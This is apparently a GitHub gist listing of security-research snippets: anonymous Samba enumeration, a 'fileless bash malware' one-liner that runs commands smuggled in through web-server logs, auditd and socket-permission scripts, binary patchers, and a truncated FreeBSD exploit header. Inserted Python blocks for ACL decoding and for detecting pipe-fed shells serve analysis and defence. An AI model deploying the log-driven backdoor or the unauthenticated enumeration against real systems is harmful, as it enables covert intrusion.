
Tim Brown timb-machine

timb-machine / Yo Samba, what files do you have?
Last active August 30, 2025 16:46
$ echo netfilegetsec 'IPC$' /etc/shadow | rpcclient -U '%' 10.10.10.3
revision: 1
type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE
DACL
ACL Num ACEs: 3 revision: 2
---
ACE
type: ACCESS ALLOWED (0) flags: 0x00
Specific bits: 0x1ff
Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS
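The Permissions line is just an NT access mask, and it reads more easily once it is split into its generic, standard and FILE_* bits; the question a tester actually wants answered is which broad principals (Everyone, Anonymous Logon, Authenticated Users) are left with write-capable rights after allow and deny ACEs are walked in order. The Python below is an added example, not part of the gist: it parses rpcclient's security descriptor dump, decodes each mask and computes per-SID effective rights. The sample dump is constructed to match the layout above; the first ACE reuses the 0x1e01ff mask shown, but the SID lines are assumptions, since the preview on this page is cut off before them. Group membership is not resolved, so the result is a lower bound on what a caller holding a given SID can do.

```python
import re

# Bits of an NT access mask. rpcclient prints the mask on each ACE's
# "Permissions:" line; the low 9 bits ("Specific bits") are the FILE_* rights.
GENERIC_RIGHTS = {0x10000000: "GENERIC_ALL", 0x20000000: "GENERIC_EXECUTE",
                  0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"}
STANDARD_RIGHTS = {0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
                   0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE"}
FILE_RIGHTS = {0x001: "FILE_READ_DATA", 0x002: "FILE_WRITE_DATA", 0x004: "FILE_APPEND_DATA",
               0x008: "FILE_READ_EA", 0x010: "FILE_WRITE_EA", 0x020: "FILE_EXECUTE",
               0x040: "FILE_DELETE_CHILD", 0x080: "FILE_READ_ATTRIBUTES",
               0x100: "FILE_WRITE_ATTRIBUTES"}
# Any of these lets the holder change the file's contents or its descriptor:
# FILE_WRITE_DATA|FILE_APPEND_DATA|FILE_WRITE_EA|FILE_WRITE_ATTRIBUTES (0x116),
# DELETE, WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE.
WRITE_RIGHTS = 0x116 | 0x10000 | 0x40000 | 0x80000 | 0x10000000 | 0x40000000
# Well-known SIDs that amount to "anyone who can reach the share".
BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-7": "Anonymous Logon",
              "S-1-5-11": "Authenticated Users"}

ACE_TYPE_RE = re.compile(
    r"type:\s+(?P<name>.+?)\s+\((?P<code>\d+)\)\s+flags:\s+0x(?P<flags>[0-9a-fA-F]+)")
ACE_MASK_RE = re.compile(r"Permissions:\s+0x(?P<mask>[0-9a-fA-F]+)")


def decode_mask(mask):
    """Names of every right set in an access mask, generic bits first."""
    return [name for table in (GENERIC_RIGHTS, STANDARD_RIGHTS, FILE_RIGHTS)
            for bit, name in table.items() if mask & bit]


def parse_aces(output):
    """Pull the ACE blocks out of rpcclient's security descriptor dump."""
    aces, cur = [], None
    for raw in output.splitlines():
        line = raw.strip()
        if line == "ACE":
            cur = {"type": None, "code": None, "flags": 0, "mask": 0, "sid": None}
            aces.append(cur)
        elif cur is None:
            continue                      # header lines before the first ACE
        elif line.startswith("type:"):
            m = ACE_TYPE_RE.match(line)
            if m:
                cur["type"] = m.group("name")
                cur["code"] = int(m.group("code"))
                cur["flags"] = int(m.group("flags"), 16)
        elif line.startswith("Permissions:"):
            m = ACE_MASK_RE.match(line)
            if m:
                cur["mask"] = int(m.group("mask"), 16)
        elif line.startswith("SID:"):
            cur["sid"] = line.split(None, 1)[1].strip()
    return aces


def effective_rights(aces, sid):
    """Rights the DACL leaves this exact SID with, walking ACEs in order the
    way NT does: a bit an earlier ACE denied cannot be allowed by a later
    one, and vice versa. Group membership is not resolved (lower bound)."""
    allowed = denied = 0
    for ace in aces:
        if ace["sid"] != sid:
            continue
        if ace["code"] == 0:              # ACCESS_ALLOWED_ACE_TYPE
            allowed |= ace["mask"] & ~denied
        elif ace["code"] == 1:            # ACCESS_DENIED_ACE_TYPE
            denied |= ace["mask"] & ~allowed
    return allowed


def broad_writers(aces):
    """Broad principals that end up with at least one write-capable right."""
    return [sid for sid in BROAD_SIDS if effective_rights(aces, sid) & WRITE_RIGHTS]


# Constructed dump in rpcclient's layout (assumed SIDs, not from the page).
# The deny ACE ahead of the allow for S-1-5-11 shows why order matters.
SAMPLE = """\
revision: 1
type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE
DACL
    ACL     Num ACEs:       3       revision:       2
    ---
    ACE
        type: ACCESS ALLOWED (0) flags: 0x00
        Specific bits: 0x1ff
        Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS
        SID: S-1-1-0

    ACE
        type: ACCESS DENIED (1) flags: 0x00
        Specific bits: 0x116
        Permissions: 0xd0116: WRITE_OWNER_ACCESS WRITE_DAC_ACCESS DELETE_ACCESS
        SID: S-1-5-11

    ACE
        type: ACCESS ALLOWED (0) flags: 0x00
        Specific bits: 0x1ff
        Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS
        SID: S-1-5-11
"""

if __name__ == "__main__":
    parsed = parse_aces(SAMPLE)
    for ace in parsed:
        print(f"{ace['type']:<15}{ace['sid']:<10} 0x{ace['mask']:08x} {' '.join(decode_mask(ace['mask']))}")
    for sid in broad_writers(parsed):
        print(f"write-capable: {BROAD_SIDS[sid]} ({sid}) 0x{effective_rights(parsed, sid):08x}")
```

Feed it real output by piping `rpcclient ... | python3 -` style input into parse_aces instead of SAMPLE; 0x1e01ff decodes to everything except DELETE, which is why rpcclient's own name list above omits DELETE_ACCESS.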
timb-machine / Fileless bash malware
Last active August 30, 2025 21:31
$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash
$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'
root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
root 11125 10680 17 21:27 pts/1 00:00:02 bash
$ ls /proc/11125/fd
total 0
dr-x------ 2 root root 0 Jun 28 21:27 .
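What the listing of /proc/11125/fd is checking is that the running bash has no script on disk: its commands arrived on standard input over a pipe, so nothing under fd points at a file an investigator could collect. The Python below is an added example, not part of the gist: it classifies shell processes from their argv and fd link targets and flags the pipe-fed case, with a scan_proc helper that applies the same check to a live Linux /proc. The sample processes are constructed to mirror the ps output above (a bash with no arguments whose fd 0 is a pipe, sitting on pts/1); the category names are my own.

```python
import os

SHELLS = {"sh", "bash", "dash", "ksh", "zsh"}


def classify_shell(cmdline, fds):
    """Classify a process from its argv list and a {fd: link_target} map,
    i.e. what /proc/PID/cmdline and readlink(/proc/PID/fd/N) give you.

    Returns one of:
      not-a-shell     argv[0] is not a known shell
      inline-command  shell -c '...'; the command is visible in argv
      script-file     a script path is in argv (bash also holds it on fd 255)
      interactive     stdin is a terminal
      stdin-script    stdin is a pipe or socket and there is no script path:
                      the script exists only in the shell's memory
      stdin-file      stdin is redirected from a file
    """
    if not cmdline:
        return "not-a-shell"
    # Login shells show up as "-bash"; strip the marker before matching.
    if os.path.basename(cmdline[0]).lstrip("-") not in SHELLS:
        return "not-a-shell"
    rest = cmdline[1:]
    if "-c" in rest:
        return "inline-command"
    if any(not arg.startswith("-") for arg in rest):
        return "script-file"
    stdin = fds.get(0, "")
    if stdin.startswith(("/dev/pts/", "/dev/tty")):
        return "interactive"
    if stdin.startswith(("pipe:", "socket:")):
        return "stdin-script"
    if stdin.startswith("/"):
        return "stdin-file"
    return "unknown"


def read_proc(pid):
    """Read argv and fd targets for one PID from a live Linux /proc.
    fds is empty when /proc/PID/fd is unreadable (other users' processes
    without root)."""
    with open(f"/proc/{pid}/cmdline", "rb") as fh:
        cmdline = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
    fds = {}
    fd_dir = f"/proc/{pid}/fd"
    try:
        for name in os.listdir(fd_dir):
            try:
                fds[int(name)] = os.readlink(os.path.join(fd_dir, name))
            except OSError:
                pass                      # fd closed between listdir and readlink
    except OSError:
        pass
    return cmdline, fds


def scan_proc(wanted=("stdin-script",)):
    """Return [(pid, classification, cmdline)] for live shells whose
    classification is in wanted."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            cmdline, fds = read_proc(int(entry))
        except OSError:
            continue                      # process exited or is not ours
        verdict = classify_shell(cmdline, fds)
        if verdict in wanted:
            hits.append((int(entry), verdict, cmdline))
    return hits


# Constructed samples, not captured from the page's host. "piped" mirrors
# the ps line above: a bash on pts/1 whose commands came down a pipe.
SAMPLES = {
    "piped":     (["bash"], {0: "pipe:[40123]", 1: "/dev/pts/1", 2: "/dev/pts/1"}),
    "login":     (["-bash"], {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    "script":    (["/bin/bash", "/usr/local/bin/backup.sh"],
                  {0: "/dev/null", 255: "/usr/local/bin/backup.sh"}),
    "inline":    (["bash", "-c", "id"], {0: "/dev/null"}),
    "not_shell": (["/usr/sbin/sshd", "-D"], {0: "/dev/null"}),
}

if __name__ == "__main__":
    for name, (cmdline, fds) in SAMPLES.items():
        print(f"{name:10s} {classify_shell(cmdline, fds)}")
    for pid, verdict, cmdline in scan_proc():
        print(f"live: pid {pid} {verdict} {' '.join(cmdline)}")
```

Run as root for a complete picture, since /proc/PID/fd of other users' processes is not readable otherwise; a stdin-script hit is a lead, not a verdict, because a legitimate `curl ... | bash` install looks identical until you read /proc/PID/fd/0's peer or the shell's memory.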
timb-machine / auditd-generate-rule.sh
Last active August 30, 2025 17:01
#!/bin/sh
generate_file_rule () {
filepermissions="${1}"
rulename="${2}"
while read filename
do
# one watch rule per path read from stdin: -w <path> -p <perms> -k <key>
printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
done
}
timb-machine / cvss-to-kill-chain-phase.pl
Last active August 30, 2025 17:02
#!/usr/bin/perl -w
use strict;
use Data::Dumper;
my %killchainmodel;
my $cvssmetric;
my $metricname;
my $metricscore;
my $phasename;
timb-machine / encode-in-tree.pl
Last active August 30, 2025 17:01
#!/usr/bin/perl
use Cwd;
use MIME::Base64;
$start = getcwd();
$maxnewpath = 1024;
while (sysread(STDIN, $byte, 1) != 0) {
$maxpath = 100;
$string = $byte;
timb-machine / socky.sh
Created April 5, 2020 12:41
#!/bin/sh
# Not to be confused with https://labs.portcullis.co.uk/tools/unix-socket-scanner/ which does more detailed enumeration but doesn't do permission checks
netstat -an | grep stream | awk '{print $9}' | sort | uniq | egrep -v "vms\/|^$" | while read socketname
do
if [ -n "$(printf "${socketname}" | grep "^/")" ]
then
printf "==\n"
ls -la "${socketname}"
# mode string is 10 characters; a "w" in position 9 means other-writable
if [ -n "$(ls -la "${socketname}" | grep "s.......w. ")" ]
then
printf "world writable: %s\n" "${socketname}"
fi
fi
done
timb-machine / smali-rename.sh
Last active August 30, 2025 17:01
#!/bin/sh
OLDNAME="${1}"
NEWNAME="${2}"
grep -r "${OLDNAME}" . | cut -f 1 -d : | sort | uniq | while read filename
do
cp "${filename}" "${filename}.old"
cat "${filename}.old" | sed "s/${OLDNAME}/${NEWNAME}/g" > "${filename}"
rm "${filename}.old"
done
timb-machine / iosarm7binpatch.sh
Last active August 30, 2025 16:59
#!/bin/sh
# https://osandamalith.wordpress.com
sed -i "" "s/\x00\x30\x93\xe4/\x00\x30\x93\xe5/g;s/\x00\x30\xd3\xe4/\x00\x30\xd3\xe5/g;" "${1}"
ldid -s "${1}"
timb-machine / Patching a VMDK file
Created September 4, 2017 14:40
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv) {
    int filehandle;
    char *mmapbuffer;
    filehandle = open("sarpedon-000002.vmdk", O_RDWR);
    if (filehandle < 0) { perror("open"); return 1; }
    /* map the first page read/write; MAP_SHARED makes writes to mmapbuffer land in the file */
    mmapbuffer = mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, filehandle, 0);
    if (mmapbuffer == MAP_FAILED) { perror("mmap"); close(filehandle); return 1; }
    /* edit bytes in mmapbuffer here */
    munmap(mmapbuffer, 4096);
    close(filehandle);
    return 0;
}
timb-machine / CVE-2013-2171 FreeBSD ptrace() & mmap() EoP
Last active August 30, 2025 16:57
/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may